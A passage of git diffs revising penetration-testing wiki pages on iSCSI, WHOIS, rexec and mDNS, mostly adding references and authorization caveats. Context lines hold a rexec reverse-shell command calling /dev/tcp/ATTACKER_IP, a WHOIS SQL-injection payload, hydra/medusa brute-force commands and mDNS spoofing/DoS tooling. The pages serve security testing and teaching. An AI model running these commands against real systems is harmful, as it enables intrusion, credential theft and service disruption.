+On older installations where an explicit record cannot be created, the legacy workaround is to adjust the generated node record. Discovery creates a directory such as:
 
 ```
 /etc/iscsi/nodes/iqn.1992-05.com.emc:fl1001433000190000-3-vnxe/192.168.1.2\,3260\,1/
@@ -50,9 +59,11 @@ Within the directory, there is a default file with all the settings necessary to
 1. Rename `/etc/iscsi/nodes/iqn.1992-05.com.emc:fl1001433000190000-3-vnxe/192.168.1.2\,3260\,1/` to `/etc/iscsi/nodes/iqn.1992-05.com.emc:fl1001433000190000-3-vnxe/123.123.123.123\,3260\,1/`
 2. Within `/etc/iscsi/nodes/iqn.1992-05.com.emc:fl1001433000190000-3-vnxe/123.123.123.123\,3260\,1/default`, change the `node.conn[0].address` setting to point to 123.123.123.123 instead of 192.168.1.2. This could be done with a command such as `sed -i 's/192.168.1.2/123.123.123.123/g' /etc/iscsi/nodes/iqn.1992-05.com.emc:fl1001433000190000-3-vnxe/123.123.123.123\,3260\,1/default`
 
-You may now mount the target as per the instructions in the link.<sup>[[1]](#references)[[2]](#references)</sup>
+After login, inspect the newly attached block device with `lsblk` or `lsscsi`. During an assessment, mount filesystems **read-only first** (for example, `mount -o ro,noload`) to avoid journal replay or other writes to evidence and production data.<sup>[[1]](#references)[[2]](#references)</sup>
 
-### [Mount ISCSI on Windows](<https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/ee338476(v=ws.10)?redirectedfrom=MSDN>)
+### Mount iSCSI on Windows
+
+Use the built-in Microsoft iSCSI Initiator (`iscsicpl.exe`) or the `iscsicli` command-line tool to add the target portal, discover the IQN, and connect. Apply the same read-only/evidence-handling precautions before bringing discovered disks online.<sup>[[5]](#references)</sup>
 
 ## **Manual enumeration**
 
@@ -81,7 +92,7 @@ Logging in to [iface: default, target: iqn.1992-05.com.emc:fl1001433000190000-3-
 Login to [iface: default, target: iqn.1992-05.com.emc:fl1001433000190000-3-vnxe, portal: 123.123.123.123,3260] successful.
 ```
 
-Then, you can **logout** using `–logout`
+Then, you can **log out** using `--logout`:
 
 ```bash
 iscsiadm -m node --targetname="iqn.1992-05.com.emc:fl1001433000190000-3-vnxe" -p 123.123.123.123:3260 --logout
@@ -175,8 +186,10 @@ node.conn[0].iscsi.OFMarker = No
 
 ## References
 
-- [1] [LFF-IPS-P2 Vulnerability Analysis – iSCSI pentesting guide (bitvijays)](https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html)
+- [1] [Archived LFF-IPS-P2 Vulnerability Analysis - iSCSI pentesting guide](https://web.archive.org/web/20230000000000id_/https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html)
 - [2] [LFF-IPS-P2 Vulnerability Analysis – iscsiadm section (ptestmethod docs mirror)](https://ptestmethod.readthedocs.io/en/latest/LFF-IPS-P2-VulnerabilityAnalysis.html#iscsiadm)
+- [3] [RFC 7143 - Internet Small Computer System Interface (iSCSI) Protocol](https://datatracker.ietf.org/doc/html/rfc7143)
+- [4] [Open-iSCSI - iscsiadm usage and node database](https://github.com/open-iscsi/open-iscsi)
+- [5] [Microsoft Learn - iSCSI Target Server overview](https://learn.microsoft.com/en-us/windows-server/storage/iscsi/iscsi-target-server)
 
 {{#include ../banners/hacktricks-training.md}}
-

--- a/src/network-services-pentesting/3260-pentesting-iscsi.md
+++ b/src/network-services-pentesting/3260-pentesting-iscsi.md
@@ -63,7 +63,16 @@ After login, inspect the newly attached block device with `lsblk` or `lsscsi`. D
 
 ### Mount iSCSI on Windows
 
-Use the built-in Microsoft iSCSI Initiator (`iscsicpl.exe`) or the `iscsicli` command-line tool to add the target portal, discover the IQN, and connect. Apply the same read-only/evidence-handling precautions before bringing discovered disks online.<sup>[[5]](#references)</sup>
+Use the built-in Microsoft iSCSI Initiator (`iscsicpl.exe`), PowerShell iSCSI module, or legacy `iscsicli` tool to add the target portal, discover the IQN, and connect. For example:<sup>[[5]](#references)</sup>
+
+```powershell
+New-IscsiTargetPortal -TargetPortalAddress <TARGET_IP>
+Get-IscsiTarget
+Connect-IscsiTarget -NodeAddress '<TARGET_IQN>' -IsPersistent $false
+Get-IscsiSession
+```
+
+Apply the same read-only/evidence-handling precautions before bringing discovered disks online. Disconnect the temporary session with `Disconnect-IscsiTarget -NodeAddress '<TARGET_IQN>' -Confirm:$false` when the assessment is complete.
 
 ## **Manual enumeration**
 
@@ -190,6 +199,6 @@ node.conn[0].iscsi.OFMarker = No
 - [2] [LFF-IPS-P2 Vulnerability Analysis – iscsiadm section (ptestmethod docs mirror)](https://ptestmethod.readthedocs.io/en/latest/LFF-IPS-P2-VulnerabilityAnalysis.html#iscsiadm)
 - [3] [RFC 7143 - Internet Small Computer System Interface (iSCSI) Protocol](https://datatracker.ietf.org/doc/html/rfc7143)
 - [4] [Open-iSCSI - iscsiadm usage and node database](https://github.com/open-iscsi/open-iscsi)
-- [5] [Microsoft Learn - iSCSI Target Server overview](https://learn.microsoft.com/en-us/windows-server/storage/iscsi/iscsi-target-server)
+- [5] [Microsoft Learn - Windows iSCSI Initiator PowerShell module](https://learn.microsoft.com/en-us/powershell/module/iscsi/?view=windowsserver2025-ps)
 
 {{#include ../banners/hacktricks-training.md}}

--- a/src/network-services-pentesting/43-pentesting-whois.md
+++ b/src/network-services-pentesting/43-pentesting-whois.md
@@ -4,7 +4,7 @@
 
 ## Basic Information
 
-The **WHOIS** protocol serves as a standard method for **inquiring about the registrants or holders of various Internet resources** through specific databases. These resources encompass domain names, blocks of IP addresses, and autonomous systems, among others. Beyond these, the protocol finds application in accessing a broader spectrum of information.
+The **WHOIS** protocol provides text-based queries for information about Internet resources, including domain names, IP address blocks, and autonomous systems. The data model and query syntax are service-specific; RFC 3912 standardizes only the simple transport exchange.<sup>[[3]](#references)</sup>
 
 **Default port:** 43
 
@@ -13,7 +13,7 @@ PORT   STATE  SERVICE
 43/tcp open   whois?
 ```
 
-From an offensive point of view, remember that **WHOIS is just a plain-text TCP service**: the client sends a query, the server returns human-readable text, and the **connection close marks the end of the response**. There is **no built-in authentication, integrity, or confidentiality** in the protocol.
+From an offensive point of view, remember that **WHOIS is a plain-text TCP service**: the client sends a query terminated by CRLF, the server returns text, and the **connection close marks the end of the response**. The protocol has no built-in authentication, integrity, or confidentiality.<sup>[[3]](#references)</sup>
 
 ### Modern Reality: WHOIS vs RDAP
 
@@ -48,13 +48,13 @@ printf '8.8.8.8\r\n' | nc -vn <HOST> 43
 printf 'AS15169\r\n' | nc -vn <HOST> 43
 ```
 
-Notice than sometimes when requesting for some information to a WHOIS service the database being used appears in the response:
+Sometimes a WHOIS response identifies the database or upstream registry being queried:
 
 ![Domain - IP / CIDR / ASN examples: Notice than sometimes when requesting for some information to a WHOIS service the database being used appears in the response](<../images/image (301).png>)
 
 ### Referral Chasing and Better Enumeration
 
-A lot of useful WHOIS enumeration is hidden behind **referrals**. For example, one server may only point you to the next authoritative WHOIS server for a TLD or an RIR. This is worth testing manually because some custom services mishandle follow-up queries, redact fields inconsistently, or leak extra backend metadata.
+Useful WHOIS enumeration is often hidden behind **referrals**. One server may only identify the next authoritative service for a TLD or RIR. Test referral handling manually because custom clients and gateways can redact fields inconsistently or expose backend metadata.<sup>[[4]](#references)</sup>
 
 Useful options and helpers:
 
@@ -87,13 +87,13 @@ curl -s https://www.rdap.net/domain/example.com | jq
 curl -s https://rdap.arin.net/registry/ip/8.8.8.8 | jq
 ```
 
-A practical offensive nuance: a 2024 measurement study comparing WHOIS and RDAP at scale found that they are **not always interchangeable**, with inconsistencies in fields such as registrar identifiers, creation dates, and nameservers. If your recon pipeline depends on those values, compare both sources before making decisions.
+A 2024 measurement study comparing WHOIS and RDAP at scale found that they are **not always interchangeable**, with inconsistencies in fields such as registrar identifiers, creation dates, and nameservers. If a recon pipeline depends on those values, compare both sources before making decisions.<sup>[[5]](#references)</sup>
 
 ## Offensive Notes
 
 ### Backend Injection in Custom WHOIS Gateways
 
-Also, the WHOIS service always needs to use a **database** to store and extract the information. So, a possible **SQLInjection** could be present when **querying** the database from some information provided by the user. For example doing: `whois -h 10.10.10.155 -p 43 "a') or 1=1#"` you could be able to **extract all** the **information** saved in the database.
+Custom WHOIS gateways commonly query a registry database or proxy another directory. If input is concatenated into a backend query, **SQL injection** or another injection class may be possible. For example, an authorized lab test might send `whois -h 10.10.10.155 -p 43 "a') or 1=1#"`; this is an implementation flaw, not a property of the WHOIS protocol.
 
 Do not limit testing to SQLi. In internal or niche WHOIS deployments, the query can be proxied to:
 
@@ -140,7 +140,7 @@ Entry_1:
     The WHOIS protocol serves as a standard method for inquiring about the registrants or holders of various Internet resources through specific databases. These resources encompass domain names, blocks of IP addresses, and autonomous systems, among others. Beyond these, the protocol finds application in accessing a broader spectrum of information.
 
 
-    https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-smtp/index.html
+    https://book.hacktricks.wiki/en/network-services-pentesting/43-pentesting-whois.html
 
 Entry_2:
   Name: Banner Grab
@@ -157,6 +157,8 @@ Entry_3:
 
 - [1] [ICANN Update: Launching RDAP; Sunsetting WHOIS](https://www.icann.org/en/announcements/details/icann-update-launching-rdap-sunsetting-whois-27-01-2025-en)
 - [2] [watchTowr Labs - We Spent $20 To Achieve RCE And Accidentally Became The Admins Of .MOBI](https://labs.watchtowr.com/we-spent-20-to-achieve-rce-and-accidentally-became-the-admins-of-mobi/)
+- [3] [RFC 3912 - WHOIS Protocol Specification](https://www.rfc-editor.org/rfc/rfc3912)
+- [4] [Nmap NSE documentation - `whois-ip`](https://nmap.org/nsedoc/scripts/whois-ip.html)
+- [5] [WHOIS Right? An Analysis of WHOIS and RDAP Consistency](https://arxiv.org/abs/2406.02046)
 
 {{#include ../banners/hacktricks-training.md}}
-

--- a/src/network-services-pentesting/512-pentesting-rexec.md
+++ b/src/network-services-pentesting/512-pentesting-rexec.md
@@ -77,12 +77,13 @@ nmap -p 512 --script rexec-brute --script-args "userdb=users.txt,passdb=rockyou.
 ```
 The `rexec-brute` NSE uses the protocol described above to try credentials very quickly.<sup>[[2]](#references)</sup>
 
-### Hydra / Medusa / Ncrack
+### Hydra / Medusa
 
 ```bash
 hydra -L users.txt -P passwords.txt rexec://<target> -s 512 -t 8
+medusa -h <target> -U users.txt -P passwords.txt -M rexec
 ```
-`hydra` has a dedicated **rexec** module. This is an online authentication attack, so use conservative concurrency and honor the engagement's lockout and availability constraints. `medusa` builds that include `REXEC` can be used similarly; verify module support locally before a long run.
+`hydra` has a dedicated **rexec** module. Medusa's upstream source also includes `rexec.mod`; verify that the locally packaged build exposes it with `medusa -d` before a long run.<sup>[[5]](#references)</sup> These are online authentication attacks, so use conservative concurrency and honor the engagement's lockout and availability constraints.
 
 ### Username enumeration through server messages
 
@@ -165,5 +166,6 @@ tshark -r traffic.pcap -Y 'tcp.port == 512' -T fields -e data.decoded | \
 - [2] [Nmap NSE `rexec-brute` documentation](https://nmap.org/nsedoc/scripts/rexec-brute.html)
 - [3] [IANA Service Name and Transport Protocol Port Number Registry](https://www.iana.org/assignments/service-names-port-numbers/service-names-port-numbers.xhtml?search=512)
 - [4] [Rapid7 Metasploit - rexec_login scanner](https://www.rapid7.com/db/modules/auxiliary/scanner/rservices/rexec_login/)
+- [5] [Medusa source - REXEC password-checking module](https://github.com/jmk-foofus/medusa/blob/master/src/modsrc/rexec.c)
 
 {{#include ../banners/hacktricks-training.md}}

--- a/src/network-services-pentesting/512-pentesting-rexec.md
+++ b/src/network-services-pentesting/512-pentesting-rexec.md
@@ -4,7 +4,7 @@
 
 ## Basic Information
 
-Rexec (remote **exec**) is one of the original Berkeley *r*-services suite (together with `rlogin`, `rsh`, …).  It provides a **remote command-execution** capability **authenticated only with a clear-text username and password**.  The protocol was defined in the early 1980’s (see RFC 1060) and is nowadays considered **insecure by design**.  Nevertheless it is still enabled by default in some legacy UNIX / network-attached equipment and occasionally shows up during internal pentests.
+Rexec (remote **exec**) belongs to the classic Berkeley *r*-services family alongside `rlogin` and `rsh`. It provides **remote command execution** authenticated with a clear-text username and password. TCP port 512 is registered as the `exec` service, and GNU Inetutils documents the byte-level exchange implemented by `rexecd`.<sup>[[1]](#references)[[3]](#references)</sup> The protocol is insecure on untrusted networks but still appears on legacy UNIX and embedded equipment.
 
 **Default Port:** TCP 512 (`exec`)
 
@@ -23,7 +23,7 @@ PORT    STATE SERVICE
    * the **username**,
    * the **password**.
 3. A final NUL-terminated string with the **command** to execute is sent.
-4. The server replies with a single 8-bit status byte (0 = success, `1` = failure) followed by the command output.
+4. The server returns a NUL status byte on successful setup. GNU `rexecd` prefixes diagnostic failures with byte value `1`; stdout then uses the initial connection and an optional secondary connection carries stderr.<sup>[[1]](#references)</sup>
 
 If the first field is **non-zero**, the server opens a **second TCP connection back to the client** and uses it for stderr. This is useful both for **manual testing** and for **fingerprinting filtering / firewall issues** around the service.
 
@@ -82,7 +82,7 @@ The `rexec-brute` NSE uses the protocol described above to try credentials very 
 ```bash
 hydra -L users.txt -P passwords.txt rexec://<target> -s 512 -t 8
 ```
-`hydra` has a dedicated **rexec** module and remains the fastest offline bruteforcer .  `medusa` (`-M REXEC`) and `ncrack` (`rexec` module) can be used in the same way.
+`hydra` has a dedicated **rexec** module. This is an online authentication attack, so use conservative concurrency and honor the engagement's lockout and availability constraints. `medusa` builds that include `REXEC` can be used similarly; verify module support locally before a long run.
 
 ### Username enumeration through server messages
 
@@ -122,12 +122,12 @@ set USER_FILE users.txt
 set PASS_FILE passwords.txt
 run
 ```
-The module will spawn a shell on success and store the credentials in the database .
+The module opens a command session on success and stores validated credentials in the Metasploit database.<sup>[[4]](#references)</sup>
 
 ---
 ## Sniffing credentials
 
-Because everything is clear-text, **network captures are priceless**.  With a copy of the traffic you can extract creds without touching the target:
+Because everything is clear text, a capture from an authorized monitoring point can reveal credentials and commands without sending additional traffic to the target. The simple command below works when TShark exposes a decoded data field; otherwise, follow the TCP stream or export `tcp.payload` and decode its hex bytes.
 
 ```bash
 tshark -r traffic.pcap -Y 'tcp.port == 512' -T fields -e data.decoded | \
@@ -139,8 +139,8 @@ tshark -r traffic.pcap -Y 'tcp.port == 512' -T fields -e data.decoded | \
 ---
 ## Post-Exploitation tips
 
-* Commands run with the privileges of the supplied user.  If `/etc/pam.d/rexec` is mis-configured (e.g. `pam_rootok`), root shells are sometimes possible.
-* Rexec ignores the user’s shell and executes the command via `/bin/sh -c <cmd>`.  You can therefore use typical shell-escape tricks (`;`, ``$( )``, backticks) to chain multiple commands or spawn reverse shells:
+* Commands run with the privileges of the authenticated user. Audit `/etc/pam.d/rexec` where the daemon was built with PAM support; a permissive PAM stack can weaken the intended account policy.<sup>[[1]](#references)</sup>
+* GNU `rexecd` passes the command to the user's configured login shell. Shell metacharacters may therefore chain commands or launch a reverse shell when that shell supports them:<sup>[[1]](#references)</sup>
   ```bash
   rexec -l user -p pass <target> 'bash -c "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"'
   ```
@@ -163,5 +163,7 @@ tshark -r traffic.pcap -Y 'tcp.port == 512' -T fields -e data.decoded | \
 
 - [1] [GNU Inetutils `rexecd` / `rexec` documentation](https://www.gnu.org/software/inetutils/manual/html_node/rexecd-invocation.html)
 - [2] [Nmap NSE `rexec-brute` documentation](https://nmap.org/nsedoc/scripts/rexec-brute.html)
+- [3] [IANA Service Name and Transport Protocol Port Number Registry](https://www.iana.org/assignments/service-names-port-numbers/service-names-port-numbers.xhtml?search=512)
+- [4] [Rapid7 Metasploit - rexec_login scanner](https://www.rapid7.com/db/modules/auxiliary/scanner/rservices/rexec_login/)
 
 {{#include ../banners/hacktricks-training.md}}

--- a/src/network-services-pentesting/5353-udp-multicast-dns-mdns.md
+++ b/src/network-services-pentesting/5353-udp-multicast-dns-mdns.md
@@ -116,6 +116,8 @@ Also see generic LLMNR/NBNS/mDNS/WPAD spoofing and credential capture/relay work
 
 Modern browsers may obfuscate WebRTC host candidates with random mDNS names. On managed Chrome or Edge endpoints, `WebRtcLocalIpsAllowedUrls` permits listed origins to receive local IP addresses in ICE candidates instead. This is a per-origin compatibility policy—not a general mDNS switch—and weakens privacy for the allowed origins. The corresponding `chrome://flags/#enable-webrtc-hide-local-ips-with-mdns` experiment has existed, but flags are version-dependent and should not be used as durable enterprise configuration.<sup>[[10]](#references)</sup>
 
+On managed Windows Chrome installations, the policy is stored below `HKLM\Software\Policies\Google\Chrome\WebRtcLocalIpsAllowedUrls`, with allowlisted origins represented as numbered string values. Edge uses its own vendor policy path. Prefer the browser's policy UI or enterprise management tooling over editing the registry manually, and verify the effective policy after deployment.<sup>[[10]](#references)[[17]](#references)</sup>
+
 When that protection is disabled, permitted web applications may receive plain host candidates through ICE signaling. Those IP candidates are not “captured via mDNS”; they replace the obfuscated mDNS names in the WebRTC candidate data.<sup>[[10]](#references)</sup>
 
 ## Defensive considerations and OPSEC
@@ -169,5 +171,6 @@ When that protection is disabled, permitted web applications may receive plain h
 - [14] [IETF draft — Using Multicast DNS to protect privacy when exposing ICE candidates](https://datatracker.ietf.org/doc/html/draft-ietf-mmusic-mdns-ice-candidates-03)
 - [15] [Apple security content for iOS 18 and iPadOS 18](https://support.apple.com/en-us/121250)
 - [16] [Windows policy metadata — Configure multicast DNS (mDNS) protocol](https://policypicker.app/policy/windows/network/dns-client/configure-multicast-dns-mdns-protocol-a84770a8a85d)
+- [17] [Chrome Enterprise - Manage Chrome policies with the Windows registry](https://support.google.com/chrome/a/answer/9131254?hl=en)
 
 {{#include ../banners/hacktricks-training.md}}

--- a/src/network-services-pentesting/5353-udp-multicast-dns-mdns.md
+++ b/src/network-services-pentesting/5353-udp-multicast-dns-mdns.md
@@ -4,22 +4,23 @@
 
 ## Basic Information
 
-Multicast DNS (mDNS) enables DNS-like name resolution and service discovery inside a local link without a unicast DNS server. It uses UDP/5353 and the multicast addresses 224.0.0.251 (IPv4) and FF02::FB (IPv6). DNS Service Discovery (DNS-SD, typically used with mDNS) provides a standardized way to enumerate and describe services via PTR, SRV and TXT records.<sup>[[1]](#references)</sup>
+Multicast DNS (mDNS) provides DNS-like name resolution on a local link without a conventional unicast DNS server. It uses UDP/5353 and the multicast addresses `224.0.0.251` (IPv4) and `FF02::FB` (IPv6). DNS Service Discovery (DNS-SD), commonly carried over mDNS, describes service types and instances using PTR, SRV, TXT, A, and AAAA records.<sup>[[1]](#references)[[7]](#references)[[8]](#references)</sup>
 
 ```
 PORT     STATE SERVICE
 5353/udp open  zeroconf
 ```
 
-Key protocol details you’ll often leverage during attacks:
-- Names in the .local zone are resolved via mDNS.
-- QU (Query Unicast) bit may request unicast replies even for multicast questions.
-- Implementations should ignore packets not sourced from the local link; some stacks still accept them.
-- Probing/announcing enforces unique host/service names; interfering here creates DoS/“name squatting” conditions.
+Key protocol details relevant to an assessment:<sup>[[7]](#references)</sup>
+
+- Names in the `.local.` zone are resolved through mDNS.
+- The QU (query-unicast) bit can request a unicast reply to a multicast question.
+- An mDNS responder must silently discard IPv4 packets whose source is not on the local subnet; for IPv6, it must discard sources other than the local link unless configured as a proxy. Gateways and reflectors intentionally alter this boundary.
+- Probing and announcement establish unique host and service names. Forged conflicts can therefore create denial of service or force a device to choose a different name.
 
 ## DNS-SD service model
 
-Services are identified as _<service>._tcp or _<service>._udp under .local, e.g. _ipp._tcp.local (printers), _airplay._tcp.local (AirPlay), _adb._tcp.local (Android Debug Bridge), etc. Discover types with _services._dns-sd._udp.local, then resolve discovered instances to SRV/TXT/A/AAAA.
+Services use names such as `_<service>._tcp.local.` or `_<service>._udp.local.`. Examples include `_ipp._tcp.local.` (printing), `_airplay._tcp.local.` (AirPlay), and `_adb._tcp.local.` (Android Debug Bridge). Query `_services._dns-sd._udp.local.` to enumerate service types, then resolve instance PTR targets and their SRV/TXT/A/AAAA records.<sup>[[8]](#references)</sup>
 
 ## Network Exploration and Enumeration
 
@@ -55,15 +56,15 @@ Services are identified as _<service>._tcp or _<service>._udp under .local, e.g.
   sudo tshark -i <iface> -f "udp port 5353" -Y "dns.qry.name == \"_services._dns-sd._udp.local\""
   ```
 
-Tip: Some browsers/WebRTC use ephemeral mDNS hostnames to mask local IPs. If you see random-UUID.local candidates on the wire, resolve them with mDNS to pivot to local IPs.
+Tip: Some WebRTC implementations replace host IP addresses in ICE candidates with temporary mDNS names. A compatible peer resolves those names during ICE processing. If such a candidate appears in authorized signaling or a capture, test its resolution from the same link, but do not assume that every random `.local` name is a stable device hostname or is resolvable outside the browser's lifetime and privacy scope.<sup>[[14]](#references)</sup>
 
 ## Attacks
 
 ### mDNS name probing interference (DoS / name squatting)
 
-During the probing phase, a host checks name uniqueness. Responding with spoofed conflicts forces it to pick new names or fail. This can delay or prevent service registration and discovery.<sup>[[1]](#references)</sup>
+During the probing phase, a host checks name uniqueness. Responding with forged conflicts can force it to pick new names or fail, delaying or preventing service registration and discovery. This is disruptive active testing and should be confined to an authorized lab or maintenance window.<sup>[[1]](#references)[[7]](#references)</sup>
 
-Example with Pholus:
+Example using the legacy Python 3 port included in the Pholus repository (confirm the flags against the checked-out revision):<sup>[[9]](#references)</sup>
 ```bash
 # Block new devices from taking names by auto-faking responses
 sudo python3 pholus3.py <iface> -afre -stimeout 1000
@@ -71,10 +72,10 @@ sudo python3 pholus3.py <iface> -afre -stimeout 1000
 
 ### Service spoofing and impersonation (MitM)
 
-Impersonate advertised DNS-SD services (printers, AirPlay, HTTP, file shares) to coerce clients into connecting to you. This is especially useful to:
-- Capture documents by spoofing _ipp._tcp or _printer._tcp.
+In an authorized lab, impersonate advertised DNS-SD services (printers, AirPlay, HTTP, or file shares) to test whether clients authenticate or transmit sensitive content before validating the service. This can:
+- Capture documents by spoofing `_ipp._tcp` or `_printer._tcp`.
 - Lure clients to HTTP/HTTPS services to harvest tokens/cookies or deliver payloads.
-- Combine with NTLM relay techniques when Windows clients negotiate auth to spoofed services.
+- Capture or relay Windows authentication when a client negotiates NTLM to the spoofed service and the separate relay prerequisites are met.
 
 With bettercap’s zerogod module (mDNS/DNS-SD spoofer/impersonator):<sup>[[3]](#references)</sup>
 ```bash
@@ -104,39 +105,40 @@ Also see generic LLMNR/NBNS/mDNS/WPAD spoofing and credential capture/relay work
 ../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md
 {{#endref}}
 
-### Notes on recent implementation issues (useful for DoS/persistence during engagements)
+### Notes on implementation vulnerabilities
 
-- Avahi reachable-assertion and D-Bus crash bugs (2023) can terminate avahi-daemon on Linux distributions (e.g. CVE-2023-38469..38473, CVE-2023-1981), disrupting service discovery on target hosts until restart.
-- Cisco IOS XE Wireless LAN Controller mDNS gateway DoS (CVE-2024-20303) lets adjacent WLAN clients flood crafted mDNS, spiking WLC CPU and dropping AP tunnels—handy if you need to force client roaming or controller resets during an engagement.<sup>[[4]](#references)</sup>
-- Apple mDNSResponder logic error DoS (CVE-2024-44183) lets a sandboxed local process crash Bonjour to briefly suppress service publication/lookup on Apple endpoints; patched in current iOS/macOS releases.<sup>[[5]](#references)</sup>
-- Apple mDNSResponder correctness issue (CVE-2025-31222) allowed local privilege escalation via mDNSResponder; useful for persistence on unmanaged Macs/iPhones, fixed in recent iOS/macOS updates.<sup>[[6]](#references)</sup>
+- Avahi reachable-assertion bugs CVE-2023-38469 through CVE-2023-38473 and the D-Bus-related CVE-2023-1981 can terminate `avahi-daemon` on affected distributions, disrupting service discovery until it restarts. The exact vectors differ; install the distribution's fixed Avahi package rather than treating the identifiers as one network exploit.<sup>[[12]](#references)</sup>
+- Cisco IOS XE Wireless LAN Controller mDNS gateway CVE-2024-20303 allows an unauthenticated adjacent WLAN attacker to send a sustained stream of crafted mDNS traffic, drive controller CPU high, and potentially disconnect AP tunnels. It is a disruptive DoS condition, not a general-purpose roaming primitive.<sup>[[4]](#references)</sup>
+- Apple mDNSResponder CVE-2024-44183 allowed a local app to cause denial of service. Apple addressed the logic error in iOS/iPadOS 18; consult the matching advisory for other Apple platform releases.<sup>[[5]](#references)[[15]](#references)</sup>
+- Apple mDNSResponder CVE-2025-31222 was a local privilege-escalation correctness issue fixed in macOS Sequoia 15.5. Apple's advisory describes a local user impact; it is not a remote mDNS network exploit and the cited macOS advisory does not establish iPhone impact.<sup>[[6]](#references)[[13]](#references)</sup>
 
 ### Browser/WebRTC mDNS considerations
 
-Modern Chromium/Firefox obfuscate host candidates with random mDNS names. You can re-expose LAN IPs on managed endpoints by pushing the Chrome policy `WebRtcLocalIpsAllowedUrls` (or toggling `chrome://flags/#enable-webrtc-hide-local-ips-with-mdns`/Edge equivalent) so ICE exposes host candidates instead of mDNS; set via `HKLM\Software\Policies\Google\Chrome`.
+Modern browsers may obfuscate WebRTC host candidates with random mDNS names. On managed Chrome or Edge endpoints, `WebRtcLocalIpsAllowedUrls` permits listed origins to receive local IP addresses in ICE candidates instead. This is a per-origin compatibility policy—not a general mDNS switch—and weakens privacy for the allowed origins. The corresponding `chrome://flags/#enable-webrtc-hide-local-ips-with-mdns` experiment has existed, but flags are version-dependent and should not be used as durable enterprise configuration.<sup>[[10]](#references)</sup>
 
-When users disable the protection manually (common in WebRTC troubleshooting guides), their browsers start advertising plain host candidates again, which you can capture via mDNS or ICE signaling to speed up host discovery.
+When that protection is disabled, permitted web applications may receive plain host candidates through ICE signaling. Those IP candidates are not “captured via mDNS”; they replace the obfuscated mDNS names in the WebRTC candidate data.<sup>[[10]](#references)</sup>
 
 ## Defensive considerations and OPSEC
 
 - Segment boundaries: Don’t route 224.0.0.251/FF02::FB between security zones unless an mDNS gateway is explicitly required. If you must bridge discovery, prefer allowlists and rate limits.
 - Windows endpoints/servers:
-  - To hard-disable name resolution via mDNS set the registry value and reboot:
+  - A widely used legacy DNS Client setting is the following value followed by a reboot:
     ```
     HKLM\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\EnableMDNS = 0 (DWORD)
     ```
+    This affects the Windows DNS Client implementation, not necessarily Bonjour or another application's own responder. Verify the resulting traffic on the exact Windows build.
   - In managed environments, disable the built-in “mDNS (UDP-In)” Windows Defender Firewall rule (at least on the Domain profile) to prevent inbound mDNS processing while preserving home/roaming functionality.
-  - On newer Windows 11 builds/GPO templates, use the policy “Computer Configuration > Administrative Templates > Network > DNS Client > Configure multicast DNS (mDNS) protocol” and set it to Disabled.
+  - Where the installed ADMX templates expose it, set **Computer Configuration → Administrative Templates → Network → DNS Client → Configure multicast DNS (mDNS) protocol** to **Disabled**. The policy-backed value is `HKLM\Software\Policies\Microsoft\Windows NT\DNSClient\EnableMDNS`; do not confuse this with the older `EnableMulticast` value used for LLMNR.<sup>[[16]](#references)</sup>
 - Linux (Avahi):
-  - Lock down publishing when not needed: set `disable-publishing=yes`, and restrict interfaces with `allow-interfaces=` / `deny-interfaces=` in `/etc/avahi/avahi-daemon.conf`.
-  - Consider `check-response-ttl=yes` and avoid `enable-reflector=yes` unless strictly required; prefer `reflect-filters=` allowlists when reflecting.
+  - Lock down publishing when not needed with `disable-publishing=yes`, and restrict interfaces using `allow-interfaces=` or `deny-interfaces=` in `/etc/avahi/avahi-daemon.conf`.
+  - Consider `check-response-ttl=yes`. Avoid `enable-reflector=yes` unless required, and use `reflect-filters=` allowlists when reflecting. Note that the Avahi man page warns that enabling both reflection and wide-area DNS may create a security risk.<sup>[[11]](#references)</sup>
 - macOS: Restrict inbound mDNS at host/network firewalls when Bonjour discovery is not needed for specific subnets.
 - Monitoring: Alert on unusual surges in `_services._dns-sd._udp.local` queries or sudden changes in SRV/TXT of critical services; these are indicators of spoofing or service impersonation.
 
 ## Tooling quick reference
 
 - nmap NSE: `dns-service-discovery` and `broadcast-dns-service-discovery`.
-- Pholus: active scan, reverse mDNS sweeps, DoS and spoofing helpers.
+- Pholus: legacy active-scan, reverse-mDNS, DoS, and spoofing helpers. The upstream repository is old; run it only in an isolated authorized environment and validate its dependencies and command-line syntax.<sup>[[9]](#references)</sup>
   ```bash
   # Passive sniff (timeout seconds)
   sudo python3 pholus3.py <iface> -stimeout 60
@@ -149,16 +151,6 @@ When users disable the protection manually (common in WebRTC troubleshooting gui
   ```
 - bettercap zerogod: discover, save, advertise, and impersonate mDNS/DNS-SD services (see examples above).
 
-## Spoofing/MitM
-
-The most interesting attack you can perform over this service is to perform a MitM in the communication between the client and the real server. You might be able to obtain sensitive files (MitM the communication with the printer) or even credentials (Windows authentication).\
-For more information check:
-
-
-{{#ref}}
-../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md
-{{#endref}}
-
 ## References
 
 - [1] [Practical IoT Hacking: The Definitive Guide to Attacking the Internet of Things](https://books.google.co.uk/books/about/Practical_IoT_Hacking.html?id=GbYEEAAAQBAJ&redir_esc=y)
@@ -167,5 +159,15 @@ For more information check:
 - [4] [Cisco IOS XE WLC mDNS gateway DoS (CVE-2024-20303) advisory](https://www.cisco.com/c/en/us/support/docs/csa/cisco-sa-wlc-mdns-dos-4hv6pBGf.html)
 - [5] [Rapid7 advisory for Apple mDNSResponder CVE-2024-44183](https://www.rapid7.com/db/vulnerabilities/apple-mdnsresponder-cve-2024-44183/)
 - [6] [Rapid7 writeup of Apple mDNSResponder CVE-2025-31222](https://www.rapid7.com/db/vulnerabilities/apple-osx-mdnsresponder-cve-2025-31222/)
+- [7] [RFC 6762 — Multicast DNS](https://www.rfc-editor.org/rfc/rfc6762.html)
+- [8] [RFC 6763 — DNS-Based Service Discovery](https://www.rfc-editor.org/rfc/rfc6763.html)
+- [9] [Pholus mDNS/DNS-SD assessment toolkit](https://github.com/aatlasis/Pholus)
+- [10] [Chrome Enterprise policy — WebRtcLocalIpsAllowedUrls](https://chromeenterprise.google/policies/#WebRtcLocalIpsAllowedUrls)
